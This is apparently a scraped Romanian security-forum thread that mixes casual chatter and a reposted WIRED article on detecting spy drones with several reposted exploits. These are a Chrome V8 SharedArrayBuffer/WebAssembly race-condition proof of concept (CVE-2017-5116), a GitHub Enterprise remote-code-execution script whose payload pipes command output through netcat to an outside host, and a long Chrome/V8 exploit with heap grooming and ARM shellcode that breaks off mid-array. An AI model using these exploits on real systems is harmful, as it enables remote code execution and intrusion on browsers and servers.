Massaro

Iti vorbesc eu cu ei, cat platesti?

https://www.exploit-db.com/docs/english/43945-jailbreaking-ios-11.1.2-an-adventure-into-the-xnu-kernel.pdf Sursa se vede.

De bateriile de pe iPhone ne plangem toti uneori, dar cand vine vorba de performanta... nu cred ca se plange nimeni. Cand vad pe cineva care se plange de iPhone, nu stiu la ce se refera; cred ca n-a avut in mana un iPhone minim o luna. In fine, everybody with their shit. Eu zic sa-ti iei iPhone 7 daca e OK ca n-ai Jack la el. Daca iti trebuie jack, ia-ti 6s. Eu zic ca n-o sa regreti.

AS FLYING, CAMERA-WIELDING machines get ever cheaper and more ubiquitous, inventors of anti-drone technologies are marketing every possible idea for protection from hovering eyes in the sky: Drone-spotting radar. Drone-snaggingshotgun shells. Anti-drone lasers, falcons, even drone-downing drones. Now one group of Israeli researchers has developed a new technique for that drone-control arsenal—one that can not only detect that a drone is nearby, but determine with surprising precision if it's spying on you, your home, or your high-security facility. Researchers at Ben Gurion University in Beer Sheva, Israel have built a proof-of-concept system for counter-surveillance against spy drones that demonstrates a clever, if not exactly simple, way to determine whether a certain person or object is under aerial surveillance. They first generate a recognizable pattern on whatever subject—a window, say—someone might want to guard from potential surveillance. Then they remotely intercept a drone's radio signals to look for that pattern in the streaming video the drone sends back to its operator. If they spot it, they can determine that the drone is looking at their subject. In other words, they can see what the drone sees, pulling out their recognizable pattern from the radio signal, even without breaking the drone's encrypted video. "This is the first method to tell what is being captured in a drone's [first-person-view] channel" despite that encryption, says Ben Nassi, one of the Ben Gurion researchers who wrote a paper on the technique, along with a group that includes legendary cryptographer and co-inventor of the RSA encryption algorithm Adi Shamir. "You can observe without any doubt that someone is watching. If you can control the stimulus and intercept the traffic as well, you can fully understand whether a specific object is being streamed." The researchers' technique takes advantage of an efficiency feature streaming video has used for years, known as "delta frames." Instead of encoding video as a series of raw images, it's compressed into a series of changes from the previous image in the video. That means when a streaming video shows a still object, it transmits fewer bytes of data than when it shows one that moves or changes color. That compression feature can reveal key information about the content of the video to someone who's intercepting the streaming data, security researchers have shown in recent research, even when the data is encrypted. Researchers at West Point, Cornell Tech, and Tel Aviv University, for instance, used that feature as part of a technique to figure out what movie someone was watching on Netflix, despite Netflix's use of HTTPS encryption. The encrypted video streamed by a drone back to its operator is vulnerable to the same kind of analysis, the Ben Gurion researchers say. In their tests, they used a "smart film" to toggle the opacity of several panes of a house's windows while a DJI Mavic quadcopter watched it from the sky, changing the panes from opaque to transparent and back again in an on-off pattern. Then they showed that with just a parabolic antenna and a laptop, they could intercept the drone's radio signals to its operator and find that same pattern in the drone's encrypted data stream to show that the drone must have been looking at the house. In another test, they put blinking LED lights on a test subject's shirt, and then were able to pull out the binary code for "SOS" from an encrypted video focused on the person, showing that they could even potentially "watermark" a drone's video feed to prove that it spied on a specific person or building. All of that may seem like an elaborate setup to catch a spy drone in the act, when it could far more easily be spotted with a decent pair of binoculars. But Nassi argues that the technique works at ranges where it's difficult to spot a drone in the sky at all, not to mention determine precisely where its camera is pointed. They tested their method from a range of about 150 feet, but he says with a more expensive antenna, a range of more than a mile is possible. And while radar or other radio techniques can identify a drone's presence at that range, he says only the Ben Gurion researchers' trick actually know where it's looking. "To really understand what’s being captured, you have to use our method," Nassi says. Rigging your house—or body—with blinking LEDs or smart film panels would ask a lot of the average drone-wary civilian, notes Peter Singer, an author and fellow at the New America Foundation who focuses on military and security technology. But Singer suggests the technique could benefit high-security facilities trying to hide themselves from flying snoops. "It might have less implications for personal privacy than for corporate or government security," Singer says. DJI didn't respond to WIRED's request for comment. Nor did Parrot, whose drones Nassi says would also be susceptible to their technique. If the Ben Gurion researchers' technique were widely adopted, determined drone spies would no doubt find ways to circumvent the trick. The researchers note themselves that drone-piloting spies could potentially defeat their technique by, for instance, using two cameras: one for navigation with first-person streaming, and one for surveillance that stores its video locally. But Nassi argues that countermeasure, or others that "pad" video stream data to better disguise it, would come at a cost of real-time visibility or resolution for the drone operator. The spy-versus spy game of aerial drone surveillance is no doubt just getting started. But for the moment, at least, the Israeli researchers' work could give spying targets an unexpected new way to watch the watchers—through their own airborne eyes - WIRED.

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd. Technical details of a Pixel remote exploit chain The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116) New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length); } A simple PoC is as follows: <html> <h1>poc</h1> <script id="worker1"> worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } } } </script> <script> function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; } var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" }) var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web worker var sta = getSharedTypedArray(); worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web worker setTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000); //worker.terminate(); </script> </html> Restul aici. Sursa la fel.

Aici cititi. E destul de lung articolul. Sursa se vede.

Salut. Sa-mi bag pula ca tineam click apasat sa vad daca nu-i vreun text ascuns culoare pe culoare.

Tre' sa arate cumva ca se plang de salarii =)).

Te-ai dezvirginat pe piesa asta de-o impartasesti cu noi?

Un pdf pentru "Level 7" (Ultimatum - ultimele zile ale unui razboi atomic) de Mordecai Roshwald? Nu gasesc nicaieri, am vrut s-o cumpar dar pe unde am gasit-o nu o mai au pe stoc.

"Numarul numarul numarul". Mi-ai adus aminte de "Si... solutia? Care este solutia? Solutia, domnilor?" Mihaitza boss. Mars :)))))))))

Nice shit to wake up to, huh? Frumos.

Daca aveti putin mai mult timp liber, aruncati un ochi peste asta. E prea lung sa-i dau copy paste aici. Good read.

#!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "`id | nc orange.tw 12345`" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" ''' marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' payload = [ '', 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), marshal_code, '', '' ] payload = map(quote, payload) url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/' print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org" print '-'*10 + '\n' print url + '%0D%0A'.join(payload) print ''' Inserting WebHooks from: https://ghe-server/:user/:repo/settings/hooks Triggering RCE from: https://ghe-server/search?q=ggggg&type=Repositories ''' Sursa: https://www.exploit-db.com/exploits/42392/.

Am un tovaras la University of Birmingham, chiar ii place si recomanda. Cel mai greu s-a descurcat la inceput cu banii, nu pot sa-ti spun mai multe. Da-le dracu de obtiuni. Eram pe cale sa postez "Doar eu il astept pe aelius sa se ia de gramatica lui?" si uite ca ai aparut deja.

<html> // Source: https://github.com/secmob/pwnfest2016/ <script> function exploit(){ function to_hex(num){ return (num>>>0).toString(16); } function intarray_to_double(int_arr){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); uBuf[0]=int_arr[0]; uBuf[1]=int_arr[1]; return dBuf[0]; } function str_to_double(str){//leng of str must be 8 var dBuf = new Float64Array(1); var u8Buf = new Uint8Array(dBuf.buffer); for(var i=0;i<str.length;i++){ u8Buf[i] = str.charCodeAt(i); } return dBuf[0]; } function double_to_array(value){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); dBuf[0]=value; return uBuf; } function gc(){ for(var i=0;i<0x100000/16;i++){ new String; } } function getHiddenValue(){ var obj = {}; var oob = "/re/"; //oob = oob.replace("re","*".repeat(0x2000)); oob = oob.replace("re","*".repeat(0x100000)); var str = 'class x extends Array{'+oob+"}"; var fun = eval(str); Object.assign(obj,fun); return obj; } var obWin; function makeOobString(){ var hiddenValue = getHiddenValue(); var magicStr = "bbbb"; var arr=[]; var str = 'class x extends Array{}'; for(var i=0;i<str.length;i++){ arr[i]=str.charCodeAt(i); } var ob = new Array(0x200); ob.fill(0x31313131); gc(); gc(); str=String.fromCharCode.apply(null,arr); ob=ob.concat(0x32323232); var fun = eval(str); ob[2]=str; ob[3]=ob; Object.assign(fun,hiddenValue); var oobString = fun.toString(); gc(); gc(); print("begin search"); var subStr = oobString.substr(0,0x8000); var pos = subStr.indexOf(magicStr); print("end search"); if(pos==-1){ print("find magic failed"); postMessage(false); self.close(); print("unpossible"); throw "error"; }else{ print("find magic at "+pos); } oobString = oobString.substr(pos,ob.length*4); obWin=ob; return oobString; } var oobString = makeOobString(); print("get oob string successfully"); function print(){ console.log.apply(null,arguments); /*document.write('<p >'); document.write.apply(document,arguments); document.write("<p>");*/ } function str2arr(str,len){//len must be multile of 4 if(len===undefined) len = str.length; var u8a = new Uint8Array(len); for(var i=0;i<len;i++){ u8a[i] = str.charCodeAt(i); } return new Uint32Array(u8a.buffer); } function pArrayInHex(arr){ var result="<p style='font-size:8px'>"; for(var i=0;i<arr.length;i++){ result+=(arr[i]+0x100000000).toString(16).substr(-8); result+=" "; if(i%8==7) result+="<p style='font-size:8px'>"; } result+="<p>"; print(result); //alert(result); return result; } function pStrInHex(str){ //var result="<p style='font-size:8px'>"; var result="\n"; for(var i=0;i<str.length;i++){ var code = str.charCodeAt(i); result+=(code+0x100).toString(16).substr(-2); if(i%4==3) result+=" "; if(i%32==31) // result+="<p style='font-size:8px'>"; result+="\n"; } // result+="<p>"; result+="\n"; print(result); return result; } function getObjAddr(obj){ obWin[0]=obj; var value2= ((str2arr(oobString,4))[0]); return value2>>>0; } var getObj24BitsAddr = function(){ var smi=0; var code = 0; var i=0; //don't allocate heap object function getAddr(obj){ obWin[0]=obj; value=0; code = 0; i=0; for(i=2;i>=0;i--){ code = oobString.charCodeAt(i); value = code+value*256; } return value; } return getAddr; }(); var lengthInOldSpace = 0xfffffffc; var abarr=new Array(800); function sprayVM(){ var i=0; var j=0; try{ for(i=0;i<20;i++){ var u8 = new Uint8Array(0x10000000-0x500); abarr[i]=u8; } }catch(e){} try{ for(j=0;j<100;j++){ var u8 = new Uint8Array(0x8000000-0x500); abarr[i+j]=u8; } }catch(e){} print("allocate "+i+" 256M "+j+" 16M ") function getRandomInt(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } delete abarr[getRandomInt(0,i)]; } function getNewSpaceAddrs(){ /*var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%";*/ var objsInNewSpace = new Array(80); for(var i=0;i<objsInNewSpace.length;i++){ //var xx=escape(str); var xx = new Array(0x70000/4); objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; //使newspace更离散 new Uint8Array(0x100000-0x500); new Uint8Array(0x100000-0x500); } function compareNumbers(a, b) { return a - b; } objsInNewSpace = Array.from(new Set(objsInNewSpace)); objsInNewSpace = objsInNewSpace.sort(compareNumbers); return objsInNewSpace; } print("begin get new space address"); var objsInNewSpace = getNewSpaceAddrs(); while(objsInNewSpace.length<16){ objsInNewSpace = getNewSpaceAddrs(); print("new space addresses"); pArrayInHex(objsInNewSpace); } try{ sprayVM(); }catch(e){} var selectedTrunk = 0; var selectedStr = ""; function bruteForceFengShui(){ var huge_str = "x".repeat(0x100000-0x9000);//-0x9000 huge_str +="%"; var hold = new Array(100); //var holdaddress = new Array(100); for(var i=0;;i++){ var large = escape(huge_str); var addr = getObjAddr(large); //console.log(addr.toString(16) + " "+i); if(i<hold.length){ hold[i]=large; //holdaddress[i]=addr; } addr=(addr&0xfff00000)>>>0; addr = addr-0x100000; if(objsInNewSpace.indexOf(addr)!=-1){ selectedTrunk = addr; selectedStr = large; abarr.fill(1); hold.fill(1); //holdaddress.fill(1); break; } if(i===150){ /*i=0; print("tried 200 times"); abarr.fill(1); try{ sprayVM(); }catch(e){};*/ postMessage(false); close(); throw "exceed limits"; } } } bruteForceFengShui(); //to avoid allocate memory latter, initilize here var nextTrunk = selectedTrunk + 0x100000; //生成一块足够大的可读写内存 var huge_str = "eval('');"; //8000不能太大，太大会使new_space增大 for(var i=0;i<8000;i++) huge_str += 'a.a;'; huge_str += "return 10;"; var huge_func = new Function('a',huge_str); huge_func({}); function fillNewSpace(origObj){ //first object in new space at 0x8100, new spaces layout //0x40000 //0x37f00 //..... //0x40000 var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25 var gap = gap+"%"; //flat gap gap.substr(0,100); var fillstr = "%20a".repeat((0x40000-12)/4); fillstr = escape(fillstr); var addr=0; for(var i=0;i<0x100;i++){ addr = getObj24BitsAddr(origObj); if((addr&0xfffff)===0x8101) origObj=escape(gap); else origObj=unescape(fillstr); } } function findNewSpace(){ var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%"; for(var i=0;;i++){ var xx=escape(str); var straddr = getObjAddr(xx); addr=(straddr&0xfff00000)>>>0; if(addr===selectedTrunk){ print("good state "+straddr.toString(16)); break; } } } function myencode(str){ var arr = []; for(var i=0;i<str.length;i++){ if(i%2==1) arr.push(str.charCodeAt(i)); else{ arr.push(37);//% var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); arr.push(hexstr.charCodeAt(0)); arr.push(hexstr.charCodeAt(1)); } } return String.fromCharCode.apply(null,arr); } var dArray = []; var index = (0x8100-36)*2; for(var i=0;i<0x20000/8;i++){ dArray[i]=str_to_double("%03x%03x"); } var occulen = 0; var i = 0; var savedChunk = new Uint8Array(0x8100); var hiddenValue = getHiddenValue(); var arr=[]; fillNewSpace(new String); findNewSpace(); var classStr = 'class x extends Array{}'; for(var i=0;i<classStr.length;i++){ arr[i]=classStr.charCodeAt(i); } var magicStr = String.fromCharCode(0x86,0x24); classStr=String.fromCharCode.apply(null,arr); var ab = new ArrayBuffer(0x1243); var fun = eval(classStr); Object.assign(fun,hiddenValue); var oobStr = fun.toString(); /*(gdb) x/20xw 0x5600c45c array buffer layout * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 */ //overwrite huge string as array buffer var abLengthIndex = oobStr.indexOf(magicStr); var strArrayBuffer = oobStr.substr(abLengthIndex-12,32); //replace the byteLength var LengthAddr = getObjAddr(lengthInOldSpace); var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); var strBase = "\x00\x00\x00\x00"; strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); strArrayBuffer = myencode(strArrayBuffer); for(var i=0;i<strArrayBuffer.length/8;i++){ var d = strArrayBuffer.substr(i*8,8); dArray[index/8+i] = str_to_double(d); } var classStrAddr = getObjAddr(classStr)>>>0; //set read position var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head //length control the length of unscaped string, generated string has 12 bytes head //left 0x1000*2 bytes to avoid gc var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); //save the the chunk head to be corrupted var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); for(var i =0;i<savedThunkStr.length;i++){ savedChunk[i] = savedThunkStr.charCodeAt(i); } var pos1=new String; var pos1addr = getObj24BitsAddr(pos1)-1; //0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); //minus the length of double array if(occulen<0x40000+16+8) throw "no enough room"; occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray if(occulen%4!==0) throw "length don't align"; var arrocc=new Array((occulen/4)); //set unescape write position var occDoubleArray = dArray.concat(); var b=unescape(subOobStr); //restore the corrupted chunk head var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); for(var i=0;i<savedChunk.length;i++){ u8[i] = savedChunk[i]; } print("long string allocated at "+classStrAddr.toString(16)); if(typeof(selectedStr)==="string"){ print("overwrite failed"); postMessage(false); close(); return; //throw "overwrite failed"; } var fakeab = selectedStr; print("faked array buffer byte length is "+fakeab.byteLength.toString(16)); var globaldv = new Uint32Array(fakeab); function read_uint32(from_address){ var u32 = globaldv[(from_address/4)>>>0]; return u32>>>0; } function read_uint8(from_address){ from_address = from_address>>>0; var index = (from_address/4)>>>0; var mask = from_address%4; var u32 = globaldv[index]; u32 = u32<<8*(3-mask); return u32>>>24; } function read_uint32_unalign(from_address){ var u32 = 0; for(var i=3;i>=0;i--){ var u8 = read_uint8(from_address+i); u32 = u32*0x100+u8; } return u32>>>0; } //rw to execute //get function point of v8::internal::Accessors::ReconfigureToDataProperty function getFixedFunctionPoint(fakeab){ var FunctionAddress = getObjAddr(Function); var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); var map = u32[0]; u32 = new Uint32Array(fakeab,map-1,0x1000); //instance descriptors var descriptors = u32[7]; u32 = new Uint32Array(fakeab,descriptors-1,0x1000); var lengthAccessorInfo = u32[6]; u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); var setterForeign = u32[4]; u32 = new Uint32Array(fakeab,setterForeign-1,0x1000); var functionPoint = u32[1]; return functionPoint-1; } var funPoint = getFixedFunctionPoint(fakeab); print("ReconfigureToDataProperty at"+funPoint.toString(16)); var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 print("chrome.apk base at "+point.toString(16)); function find(startAddr,len,pattern){ for(var i=0; i<(len-pattern.length); i++ ) { for(var j=0;j<pattern.length;j++){ var temp = read_uint8(startAddr+i+j); //print(temp.toString(16)); if(temp!=pattern[j]) break; } if(j==pattern.length) return startAddr+i; } print("find failed"); } var pattern_position=find(point,0x10000000,pattern); print("find pattern at "+to_hex(pattern_position)); function get_dest_from_blx(addr) { var val = read_uint32_unalign(addr); var s = (val & 0x400) >> 10; var i1 = 1 - (((val & 0x20000000) >> 29) ^ s); var i2 = 1 - (((val & 0x8000000) >> 27) ^ s); var i10h = val & 0x3ff; var i10l = (val & 0x7fe0000) >> 17; var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); return ((addr + 4) & ~3) + off; } function backup_original_code(start_address){ var backup_arr = []; set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ backup_arr[i]=u8arr[i]; } return backup_arr; } function restore_original_code(start_address,backup_arr){ set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ u8arr[i]=backup_arr[i]; } } huge_func({}); print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4))); var dlsym_addr = get_dest_from_blx(pattern_position-4); print("dlsym address is "+to_hex(dlsym_addr)); var huge_func_address = getObjAddr(huge_func)-1; print("huge func address is "+to_hex(huge_func_address)); for(var i=0;i<20;i++){ print(to_hex(read_uint32(huge_func_address+i*4))); } var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 print("huge func code entry is "+to_hex(huge_func_code_entry)); print(to_hex(read_uint32(huge_func_code_entry))); //var so_str= ""; var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0